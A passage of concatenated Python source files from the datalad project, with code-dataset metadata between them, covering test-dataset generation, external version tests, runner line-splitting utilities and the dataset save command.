logging.getLogger('datalad.distribution.tests')\n\n\ndef _parse_spec(spec):\n out = [] # will return a list of tuples (min, max) for each layer\n if not spec:\n return out\n for ilevel, level in enumerate(spec.split('/')):\n if not level:\n continue\n minmax = level.split('-')\n if len(minmax) == 1: # only abs number specified\n minmax = int(minmax[0])\n min_, max_ = (minmax, minmax)\n elif len(minmax) == 2:\n min_, max_ = minmax\n if not min_: # might be omitted entirely\n min_ = 0\n if not max_:\n raise ValueError(\"Specify max number at level %d. Full spec was: %s\"\n % (ilevel, spec))\n min_ = int(min_)\n max_ = int(max_)\n else:\n raise ValueError(\"Must have only min-max at level %d\" % ilevel)\n out.append((min_, max_))\n return out\n\n\ndef _makeds(path, levels, ds=None, max_leading_dirs=2):\n \"\"\"Create a hierarchy of datasets\n\n Used recursively, with current invocation generating datasets for the\n first level, and delegating sub-levels to recursive invocation\n\n Parameters\n ----------\n path : str\n Path to the top directory under which dataset will be created.\n If relative -- relative to current directory\n levels : list of list\n List of specifications for :func:`random.randint` call per each level.\n ds : Dataset, optional\n Super-dataset which would contain a new dataset (thus its path would be\n a parent of path. Note that ds needs to be installed.\n max_leading_dirs : int, optional\n Up to how many leading directories within a dataset could lead to a\n sub-dataset\n\n Yields\n ------\n str\n Path to the generated dataset(s)\n\n \"\"\"\n # we apparently can't import api functionality within api\n from datalad.api import save\n # To simplify managing all the file paths etc\n if not isabs(path):\n path = abspath(path)\n # make it a git (or annex??) repository... ok - let's do randomly one or another ;)\n RepoClass = GitRepo if random.randint(0, 1) else AnnexRepo\n lgr.info(\"Generating repo of class %s under %s\", RepoClass, path)\n repo = RepoClass(path, create=True)\n # let's create some dummy file and add it to the beast\n fn = opj(path, \"file%d.dat\" % random.randint(1, 1000))\n with open(fn, 'w') as f:\n f.write(fn)\n repo.add(fn, git=True)\n repo.commit(msg=\"Added %s\" % fn)\n\n yield path\n\n if levels:\n # make a dataset for that one since we want to add sub datasets\n ds_ = Dataset(path)\n # Process the levels\n level, levels_ = levels[0], levels[1:]\n nrepos = random.randint(*level) # how many subds to generate\n for irepo in range(nrepos):\n # we would like to have up to 2 leading dirs\n subds_path = opj(*(['d%i' % i\n for i in range(random.randint(0, max_leading_dirs+1))]\n + ['r%i' % irepo]))\n subds_fpath = opj(path, subds_path)\n # yield all under\n for d in _makeds(subds_fpath, levels_, ds=ds_):\n yield d\n\n if ds:\n assert ds.is_installed()\n out = save(\n path,\n dataset=ds,\n )\n\n\n@build_doc\nclass CreateTestDataset(Interface):\n \"\"\"Create test (meta-)dataset.\n \"\"\"\n\n _params_ = dict(\n path=Parameter(\n args=(\"path\",),\n doc=\"path/name where to create (if specified, must not exist)\",\n constraints=EnsureStr() | EnsureNone()),\n spec=Parameter(\n args=(\"--spec\",),\n doc=\"\"\"\\\n spec for hierarchy, defined as a min-max (min could be omitted to assume 0)\n defining how many (random number from min to max) of sub-datasets to generate\n at any given level of the hierarchy. Each level separated from each other with /.\n Example: 1-3/-2 would generate from 1 to 3 subdatasets at the top level, and\n up to two within those at the 2nd level\n \"\"\",\n constraints=EnsureStr() | EnsureNone()),\n seed=Parameter(\n args=(\"--seed\",),\n doc=\"\"\"seed for rng\"\"\",\n constraints=EnsureInt() | EnsureNone()),\n\n )\n\n @staticmethod\n def __call__(path=None, *, spec=None, seed=None):\n levels = _parse_spec(spec)\n\n if seed is not None:\n # TODO: if to be used within a bigger project we shouldn't seed main RNG\n random.seed(seed)\n if path is None:\n kw = get_tempfile_kwargs({}, prefix=\"ds\")\n path = tempfile.mkdtemp(**kw)\n else:\n # so we don't override anything\n assert not exists(path)\n os.makedirs(path)\n\n # now we should just make it happen and return list of all the datasets\n return list(_makeds(path, levels))\n\n @staticmethod\n def result_renderer_cmdline(res, args):\n from datalad.ui import ui\n if res is None:\n res = []\n if not len(res):\n ui.message(\"No repos were created... oops\")\n return\n items = '\\n'.join(map(str, res))\n msg = \"{n} installed {obj} available at\\n{items}\".format(\n obj='items are' if len(res) > 1 else 'item is',\n n=len(res),\n items=items)\n ui.message(msg)\n" }, { "alpha_fraction": 0.6160497665405273, "alphanum_fraction": 0.632080078125, "avg_line_length": 33.424747467041016, "blob_id": "201c2d182d452f40781464ccf9f1219e63460513", "content_id": "6b69d3f7d85eca2fddfaf73e9ad489322919b550", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10293, "license_type": "permissive", "max_line_length": 99, "num_lines": 299, "path": "/datalad/support/tests/test_external_versions.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport logging\nimport pytest\nfrom os import linesep\n\nfrom datalad import __version__\nfrom datalad.cmd import StdOutErrCapture, WitlessRunner\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import (\n CommandError,\n MissingExternalDependency,\n OutdatedExternalDependency,\n)\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_equal,\n assert_false,\n assert_greater,\n assert_greater_equal,\n assert_in,\n assert_not_in,\n assert_raises,\n assert_true,\n create_tree,\n patch,\n set_annex_version,\n swallow_logs,\n with_tempfile,\n)\n\nfrom ..external_versions import (\n ExternalVersions,\n LooseVersion,\n)\n\n\n# just to ease testing\ndef cmp(a, b):\n return (a > b) - (a < b)\n\n\ndef test_external_versions_basic():\n ev = ExternalVersions()\n our_module = 'datalad'\n assert_equal(ev.versions, {})\n assert_equal(ev[our_module], __version__)\n # and it could be compared\n assert_greater_equal(ev[our_module], __version__)\n # We got some odd failure in this test not long are after switching to versionner\n # https://github.com/datalad/datalad/issues/5785. Verify that we do get expected\n # data types\n our_version = ev[our_module].version\n assert isinstance(our_version, (str, list)), f\"Got {our_version!r} of type {type(our_version)}\"\n assert_greater(ev[our_module], '0.1')\n assert_equal(list(ev.keys()), [our_module])\n assert_true(our_module in ev)\n assert_false('unknown' in ev)\n\n # all are LooseVersions now\n assert_true(isinstance(ev[our_module], LooseVersion))\n version_str = __version__\n assert_equal(ev.dumps(), \"Versions: %s=%s\" % (our_module, version_str))\n\n # For non-existing one we get None\n assert_equal(ev['custom__nonexisting'], None)\n # and nothing gets added to _versions for nonexisting\n assert_equal(set(ev.versions.keys()), {our_module})\n\n # but if it is a module without version, we get it set to UNKNOWN\n assert_equal(ev['os'], ev.UNKNOWN)\n # And get a record on that inside\n assert_equal(ev.versions.get('os'), ev.UNKNOWN)\n # And that thing is \"True\", i.e. present\n assert(ev['os'])\n # but not comparable with anything besides itself (was above)\n assert_raises(TypeError, cmp, ev['os'], '0')\n assert_raises(TypeError, assert_greater, ev['os'], '0')\n\n return\n ## Code below is from original duecredit, and we don't care about\n ## testing this one\n ## And we can get versions based on modules themselves\n #from datalad.tests import mod\n #assert_equal(ev[mod], mod.__version__)\n\n ## Check that we can get a copy of the versions\n #versions_dict = ev.versions\n #versions_dict[our_module] = \"0.0.1\"\n #assert_equal(versions_dict[our_module], \"0.0.1\")\n #assert_equal(ev[our_module], __version__)\n\n\ndef test_external_version_contains():\n ev = ExternalVersions()\n assert_true(\"datalad\" in ev)\n assert_false(\"does not exist\" in ev)\n\n\ndef test_external_versions_unknown():\n assert_equal(str(ExternalVersions.UNKNOWN), 'UNKNOWN')\n\n\ndef _test_external(ev, modname):\n try:\n exec(\"import %s\" % modname, globals(), locals())\n except ImportError:\n raise SkipTest(\"External %s not present\" % modname)\n except Exception as e:\n raise SkipTest(\"External %s fails to import\" % modname) from e\n assert (ev[modname] is not ev.UNKNOWN)\n assert_greater(ev[modname], '0.0.1')\n assert_greater('1000000.0', ev[modname]) # unlikely in our lifetimes\n\n\ndef test_external_versions_popular_packages():\n ev = ExternalVersions()\n\n for modname in ('scipy', 'numpy', 'mvpa2', 'sklearn', 'statsmodels', 'pandas',\n 'matplotlib', 'psychopy', 'github'):\n _test_external(ev, modname)\n\n # more of a smoke test\n assert_false(linesep in ev.dumps())\n assert_true(ev.dumps(indent=True).endswith(linesep))\n\n\n@with_tempfile(mkdir=True)\ndef test_external_versions_rogue_module(topd=None):\n ev = ExternalVersions()\n # if module throws some other non-ImportError exception upon import\n # we must not crash, but issue a warning\n modname = 'verycustomrogue__'\n create_tree(topd, {modname + '.py': 'raise Exception(\"pickaboo\")'})\n with patch('sys.path', [topd]), \\\n swallow_logs(new_level=logging.WARNING) as cml:\n assert ev[modname] is None\n assert_true(ev.dumps(indent=True).endswith(linesep))\n assert_in('pickaboo', cml.out)\n\n\ndef test_custom_versions():\n ev = ExternalVersions()\n assert(ev['cmd:annex'] > '6.20160101') # annex must be present and recentish\n assert_equal(set(ev.versions.keys()), {'cmd:annex'})\n # some older git version don't support files to be passed to\n # `commit` call under some conditions and this will lead to diverse\n # errors\n assert(ev['cmd:git'] > '2.0') # git must be present and recentish\n assert(isinstance(ev['cmd:git'], LooseVersion))\n assert_equal(set(ev.versions.keys()), {'cmd:annex', 'cmd:git'})\n\n # and there is also a version of system-wide installed git, which might\n # differ from cmd:git but should be at least good old 1.7\n assert(ev['cmd:system-git'] > '1.7')\n\n ev.CUSTOM = {'bogus': lambda: 1 / 0}\n assert_equal(ev['bogus'], None)\n assert_equal(set(ev.versions), {'cmd:annex', 'cmd:git', 'cmd:system-git'})\n\n\ndef test_ancient_annex():\n\n class _runner(object):\n def run(self, cmd, *args, **kwargs):\n if '--raw' in cmd:\n raise CommandError\n return dict(stdout=\"git-annex version: 0.1\", stderr=\"\")\n\n ev = ExternalVersions()\n with patch('datalad.support.external_versions._runner', _runner()):\n assert_equal(ev['cmd:annex'], '0.1')\n\n\ndef _test_annex_version_comparison(v, cmp_):\n class _runner(object):\n def run(self, cmd, *args, **kwargs):\n return dict(stdout=v, stderr=\"\")\n\n ev = ExternalVersions()\n with set_annex_version(None), \\\n patch('datalad.support.external_versions._runner', _runner()), \\\n patch('datalad.support.annexrepo.external_versions',\n ExternalVersions()):\n ev['cmd:annex'] < AnnexRepo.GIT_ANNEX_MIN_VERSION\n if cmp_ in (1, 0):\n AnnexRepo._check_git_annex_version()\n if cmp_ == 0:\n assert_equal(AnnexRepo.git_annex_version, v)\n elif cmp == -1:\n with assert_raises(OutdatedExternalDependency):\n ev.check('cmd:annex', min_version=AnnexRepo.GIT_ANNEX_MIN_VERSION)\n with assert_raises(OutdatedExternalDependency):\n AnnexRepo._check_git_annex_version()\n\n\ndef test_annex_version_comparison():\n # see https://github.com/datalad/datalad/issues/1128\n for cmp_, base in [(-1, '6.2011'), (1, \"2100.0\")]:\n # there could be differing versions of a version\n # release, snapshot, neurodebian build of a snapshot\n for v in base, base + '-g0a34f08', base + '+gitg9f179ae-1~ndall+1':\n # they all must be comparable to our specification of min version\n _test_annex_version_comparison(v, cmp_)\n _test_annex_version_comparison(str(AnnexRepo.GIT_ANNEX_MIN_VERSION), 0)\n\n\ndef _test_list_tuple(thing):\n version = ExternalVersions._deduce_version(thing)\n assert_greater(version, '0.0.1')\n assert_greater('0.2', version)\n assert_equal('0.1', version)\n assert_equal(version, '0.1')\n\n\ndef test_list_tuple():\n\n class thing_with_tuple_version:\n __version__ = (0, 1)\n\n class thing_with_list_version:\n __version__ = [0, 1]\n\n for v in thing_with_list_version, thing_with_tuple_version, '0.1', (0, 1), [0, 1]:\n _test_list_tuple(v)\n\n\ndef test_system_ssh_version():\n try:\n WitlessRunner().run(['ssh', '-V'], protocol=StdOutErrCapture)\n except FileNotFoundError as exc:\n pytest.skip(f\"no ssh binary available: {exc}\")\n ev = ExternalVersions()\n assert ev['cmd:system-ssh'] # usually we have some available at boxes we test\n\n\ndef test_ssh_versions():\n for s, v in [\n ('OpenSSH_7.4p1 Debian-6, OpenSSL 1.0.2k 26 Jan 2017', '7.4p1'),\n ('OpenSSH_8.1p1, LibreSSL 2.7.3', '8.1p1'),\n ('OpenSSH_for_Windows_8.1p1, LibreSSL 3.0.2', '8.1p1'),\n ]:\n ev = ExternalVersions()\n # TODO: figure out leaner way\n class _runner(object):\n def run(self, cmd, *args, **kwargs):\n return dict(stdout=\"\", stderr=s)\n with patch('datalad.support.external_versions._runner', _runner()):\n assert_equal(ev['cmd:system-ssh'], v)\n\n\ndef test_humanize():\n # doesn't provide __version__\n assert ExternalVersions()['humanize']\n\n\ndef test_check():\n ev = ExternalVersions()\n # should be all good\n ev.check('datalad')\n ev.check('datalad', min_version=__version__)\n\n with assert_raises(MissingExternalDependency):\n ev.check('dataladkukaracha')\n with assert_raises(MissingExternalDependency) as cme:\n ev.check('dataladkukaracha', min_version=\"buga\", msg=\"duga\")\n\n assert_in(\"duga\", str(cme.value))\n\n with assert_raises(OutdatedExternalDependency):\n ev.check('datalad', min_version=\"10000000\") # we will never get there!\n\n\ndef test_add():\n ev = ExternalVersions()\n ev.add('custom1', lambda: \"0.1.0\")\n assert_in(\"custom1=0.1.0\", ev.dumps(query=True))\n assert_not_in(\"numpy\", ev.INTERESTING) # we do not have it by default yet\n assert_not_in(\"numpy=\", ev.dumps(query=True))\n ev.add('numpy')\n try:\n import numpy\n except ImportError:\n # no numpy, we do not have some bogus entry\n assert_not_in(\"numpy=\", ev.dumps(query=True))\n else:\n assert_in(\"numpy=%s\" % numpy.__version__, ev.dumps(query=True))\n assert_in(\"custom1=0.1.0\", ev.dumps(query=True)) # we still have that one\n\n # override with a new function will work\n ev.add('custom1', lambda: \"0.2.0\")\n assert_in(\"custom1=0.2.0\", ev.dumps(query=True))\n" }, { "alpha_fraction": 0.5761099457740784, "alphanum_fraction": 0.5782241225242615, "avg_line_length": 36.58940505981445, "blob_id": "a0b87d272e25c78e43fb4624373d4f08b398c66d", "content_id": "743d2fb78a302ecc085c4482c76286845d2846f2", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5676, "license_type": "permissive", "max_line_length": 87, "num_lines": 151, "path": "/datalad/runner/utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Utilities required by runner-related functionality\n\nAll runner-related code imports from here, so this is a comprehensive declaration\nof utility dependencies.\n\"\"\"\nfrom __future__ import annotations\n\nimport logging\nfrom collections import defaultdict\nfrom typing import Optional\n\n__docformat__ = \"numpy\"\n\nlogger = logging.getLogger(\"datalad.runner.utils\")\n\n\nclass LineSplitter:\n \"\"\"\n A line splitter that handles 'streamed content' and is based\n on python's built-in splitlines().\n \"\"\"\n def __init__(self,\n separator: Optional[str] = None,\n keep_ends: bool = False\n ) -> None:\n \"\"\"\n Create a line splitter that will split lines either on a given\n separator, if 'separator' is not None, or on one of the known line\n endings, if 'separator' is None, the line endings are determined by\n python, they include, for example, \"\\n\", and \"\\r\\n\".\n\n Parameters\n ----------\n separator: Optional[str]\n If not None, the provided separator will be used to split lines.\n keep_ends: bool\n If True, the separator will be contained in the returned lines.\n \"\"\"\n self.separator = separator\n self.keep_ends = keep_ends\n self.remaining_data: str | None = None\n\n def process(self,\n data: str\n ) -> list[str]:\n\n assert isinstance(data, str), f\"data ({data}) is not of type str\"\n\n # There is nothing to do if we do not get any data, since\n # remaining data would not change, and if it is not None,\n # it has already been parsed.\n if data == \"\":\n return []\n\n # Update remaining data before attempting to split lines.\n if self.remaining_data is None:\n self.remaining_data = \"\"\n self.remaining_data += data\n\n if self.separator is None:\n # If no separator was specified, use python's built in\n # line split wisdom to split on any known line ending.\n lines_with_ends = self.remaining_data.splitlines(keepends=True)\n detected_lines = self.remaining_data.splitlines()\n\n # If the last line is identical in lines with ends and\n # lines without ends, it was unterminated, remove it\n # from the list of detected lines and keep it for the\n # next round\n if lines_with_ends[-1] == detected_lines[-1]:\n self.remaining_data = lines_with_ends[-1]\n del lines_with_ends[-1]\n del detected_lines[-1]\n else:\n self.remaining_data = None\n\n if self.keep_ends:\n return lines_with_ends\n return detected_lines\n\n else:\n # Split lines on separator. This will create additional\n # empty lines if `remaining_data` end with the separator.\n detected_lines = self.remaining_data.split(self.separator)\n\n # If replaced data did not end with the separator, it contains an\n # unterminated line. We save that for the next round. Otherwise,\n # we mark that we do not have remaining data.\n if not data.endswith(self.separator):\n self.remaining_data = detected_lines[-1]\n else:\n self.remaining_data = None\n\n # If replaced data ended with the canonical line ending, we\n # have an extra empty line in detected_lines. If it did not\n # end with canonical line ending, we have to remove the\n # unterminated line.\n del detected_lines[-1]\n\n if self.keep_ends:\n return [line + self.separator for line in detected_lines]\n return detected_lines\n\n def finish_processing(self) -> Optional[str]:\n return self.remaining_data\n\n\nclass AssemblingDecoderMixIn:\n \"\"\" Mix in to safely decode data that is delivered in parts\n\n This class can be used to decode data that is partially delivered.\n It detects partial encodings and stores the non-decoded data to\n combine it with additional data, that is delivered later, and\n decodes the combined data.\n\n Any un-decoded data is stored in the 'remaining_data'-attribute.\n \"\"\"\n def __init__(self) -> None:\n self.remaining_data: dict[int, bytes] = defaultdict(bytes)\n\n def decode(self,\n fd: int,\n data: bytes,\n encoding: str\n ) -> str:\n assembled_data = self.remaining_data[fd] + data\n try:\n unicode_str = assembled_data.decode(encoding)\n self.remaining_data[fd] = b''\n except UnicodeDecodeError as e:\n unicode_str = assembled_data[:e.start].decode(encoding)\n self.remaining_data[fd] = assembled_data[e.start:]\n return unicode_str\n\n def __del__(self) -> None:\n if any(self.remaining_data.values()):\n logger.debug(\n \"unprocessed data in AssemblingDecoderMixIn:\\n\"\n +\"\\n\".join(\n f\"fd: {key}, data: {value!r}\"\n for key, value in self.remaining_data.items())\n + \"\\n\")\n logger.warning(\"unprocessed data in AssemblingDecoderMixIn\")\n" }, { "alpha_fraction": 0.5420165657997131, "alphanum_fraction": 0.5433084964752197, "avg_line_length": 41.5724983215332, "blob_id": "4fe11861b39e9195fd9d9905b6a1e15858d50204", "content_id": "6a193f2aee9db38961199f5aa68730c2e87d55b9", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17029, "license_type": "permissive", "max_line_length": 88, "num_lines": 400, "path": "/datalad/core/local/save.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Interface to add content, and save modifications to a dataset\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nfrom functools import partial\nfrom pathlib import Path\n\nimport datalad.utils as ut\nfrom datalad.distribution.dataset import (\n Dataset,\n EnsureDataset,\n datasetmethod,\n require_dataset,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import (\n jobs_opt,\n recursion_flag,\n recursion_limit,\n save_message_opt,\n)\nfrom datalad.interface.utils import (\n discover_dataset_trace_to_targets,\n get_tree_roots,\n)\nfrom datalad.support.constraints import (\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.exceptions import CommandError\nfrom datalad.support.parallel import (\n ProducerConsumerProgressLog,\n no_subds_in_futures,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.utils import ensure_list\n\nfrom .status import Status\n\nlgr = logging.getLogger('datalad.core.local.save')\n\n\n@build_doc\nclass Save(Interface):\n \"\"\"Save the current state of a dataset\n\n Saving the state of a dataset records changes that have been made to it.\n This change record is annotated with a user-provided description.\n Optionally, an additional tag, such as a version, can be assigned to the\n saved state. Such tag enables straightforward retrieval of past versions at\n a later point in time.\n\n .. note::\n Before Git v2.22, any Git repository without an initial commit located\n inside a Dataset is ignored, and content underneath it will be saved to\n the respective superdataset. DataLad datasets always have an initial\n commit, hence are not affected by this behavior.\n \"\"\"\n # note above documents that out behavior is like that of `git add`, but\n # does not explicitly mention the connection to keep it simple.\n\n _examples_ = [\n dict(text=\"\"\"Save any content underneath the current directory, without\n altering any potential subdataset\"\"\",\n code_py=\"save(path='.')\",\n code_cmd=\"datalad save .\"),\n dict(text=\"\"\"Save specific content in the dataset\"\"\",\n code_py=\"save(path='myfile.txt')\",\n code_cmd=\"datalad save myfile.txt\"),\n dict(text=\"\"\"Attach a commit message to save\"\"\",\n code_py=\"save(path='myfile.txt', message='add file')\",\n code_cmd=\"datalad save -m 'add file' myfile.txt\"),\n dict(text=\"\"\"Save any content underneath the current directory, and\n recurse into any potential subdatasets\"\"\",\n code_py=\"save(path='.', recursive=True)\",\n code_cmd=\"datalad save . -r\"),\n dict(text=\"Save any modification of known dataset content in the \"\n \"current directory, but leave untracked files (e.g. temporary files) \"\n \"untouched\",\n code_py=\"\"\"save(path='.', updated=True)\"\"\",\n code_cmd=\"\"\"datalad save -u .\"\"\"),\n dict(text=\"Tag the most recent saved state of a dataset\",\n code_py=\"save(version_tag='bestyet')\",\n code_cmd=\"datalad save --version-tag 'bestyet'\"),\n dict(text=\"Save a specific change but integrate into last commit keeping \"\n \"the already recorded commit message\",\n code_py=\"save(path='myfile.txt', amend=True)\",\n code_cmd=\"datalad save myfile.txt --amend\")\n ]\n\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"\"specify the dataset to save\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n path=Parameter(\n args=(\"path\",),\n metavar='PATH',\n doc=\"\"\"path/name of the dataset component to save. If given, only\n changes made to those components are recorded in the new state.\"\"\",\n nargs='*',\n constraints=EnsureStr() | EnsureNone()),\n message=save_message_opt,\n message_file=Parameter(\n args=(\"-F\", \"--message-file\"),\n doc=\"\"\"take the commit message from this file. This flag is\n mutually exclusive with -m.\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n version_tag=Parameter(\n args=(\"-t\", \"--version-tag\",),\n metavar='ID',\n doc=\"\"\"an additional marker for that state. Every dataset that\n is touched will receive the tag.\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n recursive=recursion_flag,\n recursion_limit=recursion_limit,\n updated=Parameter(\n args=('-u', '--updated',),\n action='store_true',\n doc=\"\"\"if given, only saves previously tracked paths.\"\"\"),\n to_git=Parameter(\n args=(\"--to-git\",),\n action='store_true',\n doc=\"\"\"flag whether to add data directly to Git, instead of\n tracking data identity only. Use with caution, there is no\n guarantee that a file put directly into Git like this will\n not be annexed in a subsequent save operation.\n If not specified, it will be up to git-annex to decide how\n a file is tracked, based on a dataset's configuration\n to track particular paths,\n file types, or file sizes with either Git or git-annex.\n (see https://git-annex.branchable.com/tips/largefiles).\n \"\"\"),\n jobs=jobs_opt,\n amend=Parameter(\n args=('--amend',),\n action='store_true',\n doc=\"\"\"if set, changes are not recorded in a new, separate\n commit, but are integrated with the changeset of the previous\n commit, and both together are recorded by replacing that\n previous commit. This is mutually exclusive with recursive\n operation.\n \"\"\"),\n )\n\n @staticmethod\n @datasetmethod(name='save')\n @eval_results\n def __call__(path=None,\n *,\n message=None, dataset=None,\n version_tag=None,\n recursive=False, recursion_limit=None,\n updated=False,\n message_file=None,\n to_git=None,\n jobs=None,\n amend=False,\n ):\n if message and message_file:\n raise ValueError(\n \"Both a message and message file were specified for save()\")\n\n if amend and recursive:\n raise ValueError(\"Cannot amend a commit recursively.\")\n\n path = ensure_list(path)\n\n if message_file:\n with open(message_file) as mfh:\n message = mfh.read()\n\n # we want 'normal' to achieve the most compact argument list\n # for git calls\n # untracked_mode = 'no' if updated else 'normal'\n # TODO however, Repo.add() would refuse to add any dotfiles\n # in a directory that is itself untracked, hence the only\n # choice is to go with potentially crazy long lists\n # until https://github.com/datalad/datalad/issues/1454\n # has a resolution\n untracked_mode = 'no' if updated else 'all'\n\n # there are three basic scenarios:\n # 1. save modifications to any already tracked content\n # 2. save any content (including removal of deleted content)\n # to bring things to a clean state\n # 3. like (2), but only operate on a given subset of content\n # identified by paths\n # - all three have to work in conjunction with --recursive\n # - the difference between (1) and (2) should be no more\n # that a switch from --untracked=no to --untracked=all\n # in Repo.save()\n\n # we do not support\n # - simultaneous operations on multiple datasets from disjoint\n # dataset hierarchies, hence a single reference dataset must be\n # identifiable from the either\n # - curdir or\n # - the `dataset` argument.\n # This avoids complex annotation loops and hierarchy tracking.\n # - any modification upwards from the root dataset\n\n ds = require_dataset(dataset, check_installed=True, purpose='save')\n\n # use status() to do all discovery and annotation of paths\n paths_by_ds = {}\n for s in Status()(\n # ATTN: it is vital to pass the `dataset` argument as it,\n # and not a dataset instance in order to maintain the path\n # semantics between here and the status() call\n dataset=dataset,\n path=path,\n untracked=untracked_mode,\n recursive=recursive,\n recursion_limit=recursion_limit,\n on_failure='ignore',\n # for save without recursion only commit matters\n eval_subdataset_state='full' if recursive else 'commit',\n return_type='generator',\n # this could be, but for now only 'error' results are handled\n # below\n #on_failure='ignore',\n result_renderer='disabled'):\n if s['status'] == 'error':\n # Downstream code can't do anything with these. Let the caller\n # decide their fate.\n yield s\n continue\n\n # fish out status dict for this parent dataset\n ds_status = paths_by_ds.get(s['parentds'], {})\n # reassemble path status info as repo.status() would have made it\n ds_status[ut.Path(s['path'])] = \\\n {k: v for k, v in s.items()\n if k not in (\n 'path', 'parentds', 'refds', 'status', 'action',\n 'logger')}\n paths_by_ds[s['parentds']] = ds_status\n\n lgr.debug('Determined %i datasets for saving from input arguments',\n len(paths_by_ds))\n # figure out what datasets to process, start with the ones containing\n # the paths that were given as arguments\n discovered_datasets = list(paths_by_ds.keys())\n if dataset:\n # if a reference dataset was given we want to save all the way up\n # to it, so let's throw it into the mix\n discovered_datasets.append(ds.path)\n # sort the datasets into (potentially) disjoint hierarchies,\n # or a single one, if a reference dataset was given\n dataset_hierarchies = get_tree_roots(discovered_datasets)\n for rootds, children in dataset_hierarchies.items():\n edges = {}\n discover_dataset_trace_to_targets(\n rootds, children, [], edges, includeds=children)\n for superds, subdss in edges.items():\n superds_status = paths_by_ds.get(superds, {})\n for subds in subdss:\n subds_path = ut.Path(subds)\n sub_status = superds_status.get(subds_path, {})\n if not (sub_status.get(\"state\") == \"clean\" and\n sub_status.get(\"type\") == \"dataset\"):\n # start from an entry that may already exist in the\n # status record\n superds_status[subds_path] = superds_status.get(\n subds_path,\n # if we got nothing yet:\n # shot from the hip, some status config\n # to trigger this specific super/sub\n # relation to be saved\n dict(state='untracked', type='dataset')\n )\n paths_by_ds[superds] = superds_status\n\n def save_ds(args, version_tag=None):\n pdspath, paths = args\n\n pds = Dataset(pdspath)\n pds_repo = pds.repo\n # pop status for this dataset, we are not coming back to it\n pds_status = {\n # for handing over to the low-level code, we recode any\n # path relative to the real repo location, this avoid\n # cumbersome symlink handling without context in the\n # lower levels\n pds_repo.pathobj / p.relative_to(pdspath): props\n for p, props in paths.items()}\n start_commit = pds_repo.get_hexsha()\n if not all(p['state'] == 'clean' for p in pds_status.values()) or \\\n (amend and message):\n for res in pds_repo.save_(\n message=message,\n # make sure to have the `path` arg be None, as we want\n # to prevent and bypass any additional repo.status()\n # calls\n paths=None,\n # prevent whining of GitRepo\n git=True if not hasattr(pds_repo, 'uuid')\n else to_git,\n # we are supplying the full status already, do not\n # detect anything else\n untracked='no',\n _status=pds_status,\n amend=amend):\n # TODO remove stringification when datalad-core can handle\n # path objects, or when PY3.6 is the lowest supported\n # version\n for k in ('path', 'refds'):\n if k in res:\n res[k] = str(\n # recode path back to dataset path anchor\n pds.pathobj / Path(res[k]).relative_to(\n pds_repo.pathobj)\n )\n yield res\n # report on the dataset itself\n dsres = dict(\n action='save',\n type='dataset',\n path=pds.path,\n refds=ds.path,\n status='ok'\n if start_commit != pds_repo.get_hexsha()\n else 'notneeded',\n logger=lgr,\n )\n if not version_tag:\n yield dsres\n return\n try:\n # method requires str\n version_tag = str(version_tag)\n pds_repo.tag(version_tag)\n dsres.update(\n status='ok',\n version_tag=version_tag)\n yield dsres\n except CommandError as e:\n if dsres['status'] == 'ok':\n # first we yield the result for the actual save\n # TODO: we will get duplicate dataset/save record obscuring\n # progress reporting. yoh thought to decouple \"tag\" from \"save\"\n # messages but was worrying that original authors would disagree\n yield dsres.copy()\n # and now complain that tagging didn't work\n dsres.update(\n status='error',\n message=('cannot tag this version: %s', e.stderr.strip()))\n yield dsres\n\n if not paths_by_ds:\n # Special case: empty repo. There's either an empty commit only or\n # none at all. An empty one we can amend otherwise there's nothing\n # to do.\n if amend and ds.repo.get_hexsha():\n yield from save_ds((ds.pathobj, dict()), version_tag=version_tag)\n\n else:\n yield dict(action='save',\n type='dataset',\n path=ds.path,\n refds=ds.path,\n status='notneeded',\n logger=lgr)\n return\n\n # TODO: in principle logging could be improved to go not by a dataset\n # but by path(s) within subdatasets. That should provide a bit better ETA\n # and more \"dynamic\" feedback than jumpy datasets count.\n # See addurls where it is implemented that way by providing agg and another\n # log_filter\n yield from ProducerConsumerProgressLog(\n sorted(paths_by_ds.items(), key=lambda v: v[0], reverse=True),\n partial(save_ds, version_tag=version_tag),\n safe_to_consume=no_subds_in_futures,\n producer_future_key=lambda 